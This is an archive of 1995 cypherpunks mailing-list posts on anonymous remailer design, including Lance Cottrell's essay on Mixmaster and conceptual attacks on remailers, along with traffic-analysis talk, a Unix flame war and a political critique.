From: "Wei Dai" <weidai@eskimo.com>
Date: Fri, 27 Jan 95 00:17:03 PST
To: eric@remailer.net (Eric Hughes)
Subject: Traffic monitoring (Was: Reordering, not Latency)
Message-ID: <199501270816.AA23846@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

eric@remailer.net (Eric Hughes) wrote:

> If I were doing global Internet monitoring, I wouldn't be doing it
> in-band.  Too much cooperation by the vendors required; too much
> discovery.  Rather, I'd gain access to the trunks directly and do my
> own demodulation and decoding.

How would you get access to the trunks?  Aren't they mostly optic 
fibers now?  Also, since Internet traffic is growing at a geometric 
rate, the probability of anyone or any organization having the 
capacity to monitor and process ALL of Internet traffic should be 
very small and decreasing.  It would be much easier to install 
sniffers on selected local networks (e.g., those containing 
remailers or other entities you're interested in).

Wei Dai

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyirWjl0sXKgdnV5AQG12QP+LXVa/INx3JmwBqmSrZo8kNiteYIG9AwV
9hG+3qUt6/yvkz0v137lPVOGK+J78MkCDVYnPHeBcdYwmZ7Z8mpfaQGaPQnMnj9x
Q9z9hbK9JVBYaN7Hpv0OtIobKn2OlEsJjdZxr8mcuqVN/OS1kHarmhtM2pyfxJ/l
uY5/UGIlprA=
=jIHR
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> Big Bang --> atoms --> complex macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> consciousness
--> computers --> internetworking --> close-coupled automation
--> high-bandwidth brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sun, 29 Jan 95 23:43:09 PST
To: cypherpunks@toad.com
Subject: Video walls have ears
Message-ID: <gate.TJNkZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



Electric Dreams #44 is on the futility of videoconferencing; e-mail focuses
and will reign supreme. Anonymous videoconferencing is touched upon. Tim May
would approve. #45, the latest, is on Boolean algebra and Being Analogue -
analogue VLSI, bio-chips, optical and quantum computing etc.

ObCypherpunk: we all _do_ realize, of course, that serious violations of
privacy will continue for some time to be in the _analogue_ domain - from
RF interception and laser eavesdropping to thumbscrews. Perhaps some solutions
lie there too - the quantum anti-interception communication idea for example.
And lead walls.


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Thu, 26 Jan 95 22:13:14 PST
To: cypherpunks@toad.com
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <m0rWbPO-000yxSC@myriad.pc.cc.cmu.edu>
Message-ID: <1P8AlKJXYHxT078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Again in the vein of simple to implement...you could set up several
ghost machines that don't really exist but look as if they where
connected to the IP machine through uucp.  I'm not really sure what
the From: address would look like, but it should be easy to generate.

If this was workable, you could create x ghost machines and randomly
pick a From: for each message.  True, the Inet box would be ID'ed,
but as a transmission agent, not an originator.

As I said, I don't know how uucp and Internet mix today, my e-mail
address used to say {...}!uunet!reign!storm.
--
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.
 According to the obituary notices, a mean and unimportant person never dies.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 26 Jan 95 21:49:30 PST
To: tedwards@src.umd.edu (Thomas Grant Edwards)
Subject: Re: CERT statement
In-Reply-To: <Pine.SUN.3.91.950126142119.21338C-100000@thrash.src.umd.edu>
Message-ID: <199501270548.AAA02558@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| Is it my imagination, or is CERT just trying to firewall up the internet 
| into uselessness?

	Firewalls do not make the net useless, they make it possible
to do real work.  A well designed firewall is only minimally intrusive
into your work.  Far less intrusive, than say, someone reading all of
your company's unencrypted mail for a few months.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Thu, 26 Jan 95 22:14:37 PST
To: sameer <sameer@c2.org>
Subject: Re: Starting a remailer
In-Reply-To: <199501262120.NAA10701@infinity.c2.org>
Message-ID: <Zc8AlKJXYPcE078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi!

I'm going to be along to set up a remailer shortly.

Two questions:

Since I've only limited bucks but have certain needs, can I get a
package deal on a remailer shell account and the MX service?  What
I'd like is to have all mail to xxxx@myname.com to be forwarded to
my shell account no matter what xxxx is.  Preserving the xxxx, though.

Given the goal of limiting remailer liability, what about having
them be anonymous?  Instead of send you a check, send an unidentified
money order.  This would even allow ownership to change on a frequent
basis without the system owner knowing who the current operator is.

Thoughts?  Comments?  Offers to send cute girls?
--
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 26 Jan 95 21:56:47 PST
To: xpat@vm1.spcs.umn.edu
Subject: Re: "Subway" remailers
In-Reply-To: <9501262213.AA23510@toad.com>
Message-ID: <199501270556.AAA02671@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	The idea is a very good one, its usually called "link
encryption."  The idea is to make it difficult to tell when someone is
using a line by filling that line with random noise that looks like
encrypted data.

	Making a remailer do this is an interesting idea.  Perhaps a
subscription facility, so you can ask a remailer to send you X
messages per day, with X higher than your anticipated traffic?
Alternately, you could get roughly X messages per day, so a small
overflow wouldn't show up at once.

Adam



| "Subway" remailers would exchange identical sized "containers", much
| like a subway at semi-regular pulses or intervals. It would require
| a ring of remailers large enough (yeah, I know) to make traffic analysis
| of entrance and exit points difficult and/or expensive.


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Fri, 27 Jan 95 01:14:49 PST
To: cypherpunks@toad.com
Subject: Re: link encryption and anonymous interactivity (Was: "Subway" remai
Message-ID: <ab4e6664070210049f4e@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>This gives me an idea.  Imagine a server that allows you to open a
>low bandwidth (let's say around 100 cps, in order to reduce costs)
>link-encrypted telnet session with it, and provides you with a number
>of services, for example a link-encrypted talk session with another
>user.  You'll need to maintain the link 24 hours a day to defend
>against statistical analysis, and of course you can chain a number of
>these servers together in a way similiar to chaining remailers.
>
>This scheme seems to provide untracibility while getting around the
>latency cost problem of remailers, thus allowing users to talk to each
>other in real time, anonymously.
>
>Wei Dai
>

I like this. One complication comes to mind with chaining. You can not set
up the whole chain at once. That would give it all away. In some sense you
are only mixed with other people who build these "chain links" at the same
time. Since you are only likely to build one or two (once built there is no
reason to take it down), you want to build it very slowly to allow many
links to be built out of the machine you are connected to before you build
your link out the next machine in the chain.

Also, if other people take their chains down, you must too, or I suspect
that there will be some information pointing to the only chain not to have
changed (this would only be statistical). I am not so sure about this last
argument though.

                -Lance Cottrell
-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLyi3R1Vkk3dax7hlAQFKnQP9FMKTQ+mEmICIPNXOasd2O/SDy4B4yJtv
uMX1AcS8jYSoDLUqf1+j6yGj3NW++5sr/6qNE5+DXpOpc3c3plCoiFIRSL8Ir4dw
WmW9J2GBtz5pJEjWWnlCfeqvDnaHmleCDnaGv6vo3+sZJrxn/NpUEoHiduLn+yg8
poIBFxw8B6Y=
=2X/2
-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Fri, 27 Jan 95 01:14:42 PST
To: cypherpunks@toad.com
Subject: Mixmaster and remailers
Message-ID: <ab4e688f0902100421df@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


Here is a text version of an essay on Mixmaster and remailers in general.
I am going to try to put this in HTML and stick it on my home page.
If you want the original Mac version (distributed at today's San Diego
Cypherpunks meeting) let me know (Word 5.0). The list software has been
balking when I try to post in MIME encoded. The figures will be in the
HTML, and are in the Mac version.

--------------------------------
**Cypherpunk remailers.

The structure of current remailer messages is a nested set of encrypted
messages. Each message is encrypted to a remailer. The message contains the
instructions for each remailer (such as where to send the message next) and
the message to be forwarded. Each remailer removes a layer of encryption,
and accompanying instructions, takes any requested actions, and sends the
message on to the next destination.

Figure 1

The figure above graphically represents a message that will be sent through
3 remailers (A,B,C) and finally to Bob. The boxes represent encryption,
with the name of the person to whom the message is encrypted is outside the
upper left corner of the box. One important fact is immediately clear from
this diagram; the message shrinks after each hop.

Cypherpunk remailers do several things:
        Send a message to another email address or post it to a new group.
        Accepts encrypted messages with instructions for processing hidden
          inside the encrypted envelope.
        Strip of all (or at least some) mail headers.
        Add new headers (like subject lines).
        Remove some information from the end of the message.
        Encrypt part of the message using a key specified in the message.

Some but not all remailers can also do the following:
        Hold messages for some fixed or random time (latency).
        Reorder messages keeping a fixed minimum number in the remailer at
all times.


**Attacks on Cypherpunk remailers.

Since anonymous remailers are designed to prevent traffic analysis, the
best way to understand their weaknesses is to study various attacks that an
opponent might use against them. I will assume a very powerful opponent,
both to present a worst case scenario, and because it is possible to resist
these attacks using second generation remailers.

*Threat model.
I assume that an attacker is able to record the contents of all messages
into and out of all remailers, along with the times they arrive and depart.
All messages are monitored as they leave the sender's machine, and as they
arrive at the destination. The attacker is able to send an unlimited number
of messages through the remailers, including previously intercepted
messages. Messages can also be prevented from arriving at their
destinations (denial of service). The attacker has compromised some (but
not all) of the remailers, and knows the source, destination, and contents
of all messages passing through the compromised remailers. This set of
attacker abilities and resources is the threat model.

*Trivial Attacks.
From the threat model it is prima facie obvious that unencrypted messages
can be tracked, so I will consider only encrypted communications.
The use of only one remailer is also insecure. If that remailer is
compromised, you have no security because the operator knows both the
originating and final addresses.

*Reordering.
Chains of remailers with encryption are better, but still vulnerable.
Messages can be traced through these remailers, because incoming messages
are forwarded directly after processing. When a message arrives, another
leaves immediately.  With no further information the attacker knows that
these are the same message despite any precautions that may have been
taken. This can even be done retroactively using mail logs (if those are
kept).

This is the biggest problem with standard Cypherpunk remailers. The first
fix proposed was to delay incoming messages for some random length of time.
If this time were longer than the time between message arrivals, then it
would be impossible to know (with certainty) which incoming message
corresponded to which outgoing message. This proposal Is weak in several
respects. The exact amount of protection provided by latency is unknown. It
depends on the traffic through the remailer at that time. If there are many
messages arriving in the average holding time, then the identity of the
message is reasonably well disguised, but if there is very little traffic
(due to normal fluctuations, network outages, or denial of service attacks)
then little or no protection is provided. To provide some minimum level of
protection, considering only normal traffic variations, the latency must be
much larger than it would have to be at times maximum traffic.

Although reordering solves this problem, it also opens up another possible
attack. Reordering always involves keeping some number of messages in the
remailer at all times. These messages are called the message "pool." The
most efficient reordering scheme is to keep N messages in the pool, and to
send out one of the (N+1) messages in the pool (including the one that just
arrived) chosen at random. Unfortunately this scheme is susceptible to a
"spam" attack.
An attacker sends many more than N messages to the remailer. These messages
will displace all the real messages in the pool, leaving only messages
which the attacker can recognize.If many more than N messages are sent to a
remailer then the its pool of messages will contain only planted messages
(which can be recognized). If the attacker sends another batch of messages
after your message arrives, your message will be flushed back out of the
pool. Since the attacker can recognize his own message, yours will be
obvious.

Combining latency and reordering gives some resistance to this attack.
Rather than sending out one message from the pool each time a new message
arrives, periodically all but N messages in the pool are sent. If, during
an average period, several real messages have arrived then even if the pool
of messages if flushed out, there will be more than just your message mixed
in with the attacker's messages.
If the attacker combines the spam with a denial of service attack, then
your message would be the only non-attacker message again. There is nothing
you can do if the attacker can ensure that yours is the only message
traversing the entire network of remailers. With ideal remailers your
message could be any one of the messages passing through any remailer at
the same time. If yours is the only message passing through the remailer
network, then you are toast.

*Size & Distinguishability.
Suppose now that your message is chained through remailers that are
delaying and reordering at every hop. Your messages can still be tracked by
size.  By default messages decreases in size by a small (and approximately
known) amount at each hop. Even if your message is well mixed with the
other messages in the remailer, and even if they are all different sizes,
they are still distinguishable. It is possible to have the remailer remove
padding from the message at each hop, but this only to decreases the size
of the message, and only to a minimum established by the size of the actual
message you want to send. You are also limited by the fact that extremely
large messages will stand out, since your message must change size by a
large fraction of its own size at each hop to ensure maximum confusion.
While removing padding at each step makes traffic analysis much more
difficult, it does leak information. All messages that leave a remailer
larger than your message was when it arrived are known not to be yours, and
if the use of this feature is unusual, then your message will stand out as
being the only one to change size by a nonstandard amount. The solution is
clear; All messages should be exactly the same size.

*Replay attacks
Unfortunately reordered, indistinguishable messages, can still be tracked.
This attack can be used to follow a message to its final destination, or to
backtrack from the end to the original sender. Both of these techniques use
a type of spam attack. To trace a message forward through the chain of
remailers, the attacker captures your message and sends many copies of it
to the first remailer. Many identical messages will then emerge from the
remailer and move on to the next remailer. This bump in remailer traffic
will show the rout of the message. When it becomes too dispersed from
reordering, the message can be captured between two remailers, and many
copies re-introduced at that point.

To prevent this attack remailers must refuse to send any message more than
once. This can be done by including a random ID number for each hop, which
the remailer records. Unfortunately this places large storage demands on
the remailer, but the impact can be limited if old IDs are removed from the
list, or the remailer's key is changed periodically (at which point the
list can be cleared). A better solution is to require anonymous e-cash
postage in each layer. If the message is resent, then the cash has been
doubly spent, and the remailer would refuse to send it. This also has the
benefit of making spams expensive, and of motivating remailer operators to
provide superior services.


**Mixmaster.

The only type 2 remailer is Mixmaster. Its design philosophy is strongly
influenced by Chaum's paper on digital mixes (the origin of its name).
Below is a diagram of the structure of a Mixmaster packet. Rather than 4
there are actually 20 headers. Messages are sent as one or more packets
(messages consisting of multiple packets are called multi-part messages).

Figure 2

When remailer A gets this message, it will decrypt the PGP encrypted packet
at the top, and check to see if it has seen the ID number before. If so,
the message is discarded. The first header (before decryption) is added to
the end of the list of headers, and all the others are shifted up one. All
headers and the body packet (the section at the end with the text to be
sent) are decrypted with the IDEA key in the header. This reveals a PGP
encrypted header for the next remailer at the top, and obscures the old top
header (now at the bottom of the stack).

The header for the last remailer in the chain contains a flag indicating
that it is the last hop, and if it is part of a multipart message. If this
packet contains the entire message (it is not a multi-part message), the
body is decrypted and the plain text is placed in the reordering pool,
ready to be sent on. If it is only one part of the message, the Message ID
number is used to identify the other parts as they arrive. When all the
parts have arrived the message is reassembled, and placed in the pool. If
not all parts arrive within some time limit, then the message is discarded.
Only the last remailer in the chain can see that a group of remailer
packets are all part of a single message. To all the others, they are
completely independent.

All Mixmaster packets are exactly the same length, and all bits are
encrypted with an IDEA key at every hop, so no information about the
identity of the message is visible to the observer. Even a compromised
remailer can only know the previous and next locations in the chain. It can
not know how many hops have preceded it, or how many will follow (unless it
is the final hop).

These messages are rather large. Each of the 20 headers are 512 bytes, and
the body is 10k. The plain text is compressed to minimize the need for
multipart messages, which offer somewhat less security because all parts
follow the same chain of remailers.

*Future features
In the near future the Mixmaster user front end will allow the individual
packets of a multipart message to be routed independently.
Mixmaster remailers that indicate that they can accept socket connections
will exchange messages directly. The messages will be super-encrypted with
an IDEA key derived from a Diffie-Hellman key exchange. This provides
forward security against remailer operators being asked to decrypt
intercepted messages.


**Nothing is perfect.

Even if you are using a perfect network of remailers, you can still be
tracked. Only so many messages pass through the network of remailers in any
given day. If Alice sending a message usualy correlates with Bob receiving
a message, it is likely that she is sending messages to him. This was
discussed in some detail in several messages by Hal and Louis Cypher. One
defense is to send dummy messages in to the remailer "bramble" so your
messages correlate with everything. These must be sent at random times so
that your real messages do not stand out.

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sun, 29 Jan 95 23:44:48 PST
To: cypherpunks@toad.com
Subject: GDRs
Message-ID: <gate.smqkZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


perry@imsi.com:
> Not quite right. ADRs are receipts used to permit the trading of
> *foreign* securities in American markets. The ADRs will have
> properties that shield American investors from all sorts of evils like
> getting warrant issues that aren't registered in the US. There is a
> new breed of these things called GDRs that I've heard tell of, though
> I know little about them. Bank of New York may be big in this business

GDRs (Global Depository Receipts) can be traded worldwide. Lots of big Indian
companies use them, issuing GDRs that represent split shares and are loosely
linked to share prices on Indian markets.


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 26 Jan 95 22:32:52 PST
To: cypherpunks@toad.com
Subject: No more unix holy war !
Message-ID: <199501270634.BAA02738@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


From James Donald                   Jan 26, 95 07:14:19 pm +0800
[...]
> A:  This is not the proper place for such arguments.

Right, so why do you persist in sending them here ?

> B:  The statement is so flagrantly silly that the
> proper response is ridicule, not an answer.

Right, so why did you answer (and to the list, no less) ?

[...]
> [Childish insults, abuse, and flame bait deleted]

If that were true, this thread would be long dead.

[...]
> Note that although this flame has nothing to do with cypherpunks

Right, so why are you sending it to the cypherpunks list ?

From jamesd@com.informix.com        Jan 26, 95 08:05:46 pm +0800
> To summarize this thread, and I hope end it.

This was (briefly) promising.

From jamesd@com.informix.com         Jan 26, 95 09:00:03 pm +0800
> I am writing this under sun's unix imitation of Microsoft's
[...]

If you hoped to end the thread, why continue it like this less than an hour
later ?

From jamesd@com.informix.com         Jan 26, 95 09:05:10 pm +0800
> And did I mention that "make" used to treat a tab as semanticly
[...]
> Oh yes, I did mention that.
> Well I guess I will mention it again.

Why ?  What about ending the thread ?

From jamesd@com.informix.com         Jan 26, 95 09:12:31 pm +0800
> And did I mention that in DOS you can type
>    rename *.txt *.asc
[...]

3 more messages in 13 minutes, and you said you hoped this thread would end ?

From jamesd@com.informix.com         Jan 26, 95 09:38:35 pm +0800
> And did I mention that in DOS you can type:
>    dir filename /s
[...]
> You are spared.  I will not mention "curses".

Why not spare us entirely by not sending all this mail which "has nothing to
do with cypherpunks" as you said ?

"Yes, James, you're absolutely right. I prostrate myself before your
magnificence."

Will you be quiet about this now ?  What do we need to do to make you hush up ?

 -L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sun, 29 Jan 95 23:44:43 PST
To: cypherpunks@toad.com
Subject: PFF's Magna Carta and the new netserfs
Message-ID: <gate.ywRkZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


rkmoore@iol.ie (Richard K. Moore)
> Cyberspace and the American Dream:  A Magna Carta for the Knowledge Age
> Release 1.2 // August 22, 1994,  Progress and Freedom Foundation
> Analysis By:       Richard K. Moore       20 January 1995
> [...]
> It also spells the death of the central institutional paradigm of modern 
> life, the bureaucratic organization. (Governments, including the American 
> government, are the last great redoubt of bureaucratic power 
> [  Corporations, as a seat of bureaucratic power,
> [  manage to escape notice here. Ah well, so many
> [  details, so little time...

I've never figured out why governments are made out to be so bad; guns, ok,
but the problems of privacy we face on this list have little to do with that.
Corporations can be at least as bad - extreme government leads to socialism,
which often retains some form of citizen-participation in decision-making;
the corporate state, though, is exemplified in fascism, inherently much less
concerned about citizen's rights.

> Clear and enforceable property rights are essential
> for markets to work. Defining them is a central [...]
> If this analysis is correct, copyright and patent
> protection of knowledge (or at least many forms of it)
> may no longer be unnecessary...

As many of us have argued, in what is sometimes called a 'post-capitalist'
economy, (intellectual) property rights will not be enforceable. They may
be respected often - but then that requires no laws; after all no one had
tried to rob Phil Zimmerman of his (only recently trademarked) 'PGP'. Those
who depend too much on enforced rights will not survive. I've discussed in
my column, Electric Dreams, and on this list the shift in economic structure
that will have to take place - cooking-pot markets, knowledge exchanges etc;
concept patents enforced by net.cops are most certainly 'Second Wave thinking!'

> The current Administration has identified the right
> goal: Reinventing government for the 21st Century

Praise from Gingrich the Newt's pet think tank...

> This said, it is essential that we understand what it really means 
> to create a Third Wave government and begin the process of transformation.

'Third Wave' is such a lovely phrase that it is all too easy to hand wave 
opposing beliefs and concerns - "that's Second Wave thinking." Reminds me of 
the Freudian defense against Jung - "Ah, Jung was sexually repressed as an 
infant and therefore jealous of his mentor's open emphasis on id..." - 
solipsism is great for argument, but does little to elicit the truth.

> That is why obstructing such collaboration -- in the
> cause of forcing a competition between the cable and
> phone industries -- is *socially elitist*. To the

FOL! That competition and distributed ownership is elitist has long been
held true by communists; the reason we prefer it this way is that monopolies
end up being elitist too - benefiting those within them.

> [  There you have it. The American Dream and frontier
> [  competitiveness lead us inevitably to the following
> [  mandate for cyberspace:
> [        (1) strong private property rights
> [        (2) infrastructure to be owned by an
> [            unregulated private monopoly
> [        (3) investment to be written off rapidly

Those who remember their history will note that the original Magna Carta was
not a pact that distributed power from a King to the people, but to a feudal
nobility - the rest of us, netSERF on!


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@com.informix.com
Date: Fri, 27 Jan 95 02:25:28 PST
Subject: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501271025.AA00392@carbon.informix.com>
MIME-Version: 1.0
Content-Type: text/plain


Todd Masco wrote:
> Do you have any sort of life whatsoever, James?  [....]
> is a total waste of your time,
> esp. if you believe people will read the spew.
> 
> I've simply never heard of anybody caring.

If you don't care then why are you flaming me, instead 
of deleting all the posts which I have clearly labeled 
as being what they are.

As to why it is vast and voluminous pile of shit, the 
answer is because unix is a vast and voluminous,
and I was flamed for failing to to give examples 
of how unix is user hostile.

Any report on the defects of unix is necessarily lengthy.

I would send off a letter, and get back to work, then 
immediately unix would bite me again, and I would jump
in and send off another letter.  The letters kept coming
because unix kept biting me.

If I had been working on my PC, which refrains from wantonly
destroying files and presents the most used options near
the top of menus, etc, I would have peaceably ignored
this whole silly issue.  Indeed I would not have been able
to think of a single concrete example of unix user hostility.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkmoore@iol.ie (Richard K. Moore)
Date: Thu, 26 Jan 95 19:56:48 PST
To: cypherpunks@toad.com
Subject: white noise remailer
Message-ID: <199501270356.DAA07394@GPO.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain


I'm new to all this so please pardon my ignorance, but are you guys
consdidering the following approach:

The remailer transmits a constant bandwidth of outgoing messages of all
about the same size to a uniformly distributed range of target addresses.
Incoming messages are randomly dispersed within this stream, packed out to
the standard size.

-rkm


---

Richard K. Moore - rkmoore@iol.ie - Wexford, Ireland - fax +353 53 23970






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Fri, 27 Jan 95 01:06:29 PST
To: cypherpunks@toad.com
Subject: Re: CERT statement
Message-ID: <199501270902.EAA03085@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <9501270023.AA17883@snark.imsi.com>,
Perry E. Metzger <perry@imsi.com> wrote:
>Well, sort of. A key management system that operates sort of like
>Kerberos' is necessary. However, thats really far from
>sufficient. Most Kerberized protocols authenticate only at the
>beginning of the session -- very very hijackable.

I just want to chime in that telnet{,d} clients are available that do
encrypt every packet, built upon Kerberos v5 (and the GSSAPI) for key
management.  There are even libraries that sit on top of sockets with
the same interface and do the encryption (and therefore the implicit
authentication) of every packet.

I'm sure Perry knew this, but I'm also sure others didn't.  I'm afraid
I don't have any pointers at the moment (though I know that they are
in use in some parts of CMU), and unless your need is urgent
and you already use kerberos you should just wait for the new swIPe.
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyh9zBNhgovrPB7dAQGk+gP/TatFUjwI79UT1UY5IQK82wlQ/jK7tOXb
HX6zWCVU48l/vfAWHSYdS1QSQEeUMH4Z+lnW4lxW0G9fWDk/LxSlyJqnw/zDEbK+
16ePq/6AWsCCA5Gt2HchAfVoC72iYOeU0oDMQJerr6K6s2FLZrR4vSEQAUSbkoJz
VHLjcR6mrog=
=JYyc
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLyi2nSoZzwIn1bdtAQFSiwGAspboooxRv7cVKp3/aPZGVaLkkscfSh/y
PKrOIuBmAoaHmMwUGwV73ygYc3N1bvs0
=PKb8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Fri, 27 Jan 95 01:16:16 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <199501270912.EAA03174@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Do you have any sort of life whatsoever, James?  Writing a gazillion K
of flamage on your hot-button topic du jour, especially when you keep
lying about wanting to end the thread, is a total waste of your time,
esp. if you believe people will read the spew.

(I'm half believing that you're going to call me a collectivist because
 I imply that one writes so that others will read).

I've simply never heard of anybody caring.
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyiAKhNhgovrPB7dAQFRJAQAkGwvDaHc6FbNsZXglVOuH0I6b79MLqaN
cI0rPN2xIwC8w+/cL/jFNaFZDlp4/V1/AZARQaFpY+MMuLsFMBL20c1jAfws/qXO
EVFKEWNlRPDo1D85fxvNwT36J+YsLc+PB5ewWlR6AYysh+QBYzZOUhUXJsAo+Lka
Kn1PAKFDiZM=
=lPZy
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLyi47yoZzwIn1bdtAQFmWwF/UuqPF693wVp6GlI/mkKypPkyyB8thivm
WePmowpndywBGGVhtWiVMcZWzqDGEFo2
=Npk+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Fri, 27 Jan 95 02:34:05 PST
To: cypherpunks@toad.com
Subject: Re: Starting a remailer
In-Reply-To: <Zc8AlKJXYPcE078yn@ssnet.com>
Message-ID: <199501271035.FAA03167@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Don Melvin writes:
> Given the goal of limiting remailer liability, what about having
> them be anonymous?  Instead of send you a check, send an unidentified
> money order.  This would even allow ownership to change on a frequent
> basis without the system owner knowing who the current operator is.

Absolutely -- anonymity of the remailer _account holder_ is a central part of 
the "guerrilla remailer" concept AFA I'm concerned. Tim keeps reminding us 
that the distinction between the machine owner/ISP admin and the remailer
operator can be crucial, for legal reasons (i.e. the ECPA). I think it may
also be useful to push this distinction down a level, separating the _account
owner_ from the _remailer operator_. I get the feeling that in many cases the
folks willing/able to fund remailers aren't the same folks who are willing/
able to operate remailers. Hence it seems natural to have a collaboration 
between a remailer sponsor (person or group providing money to pay for an 
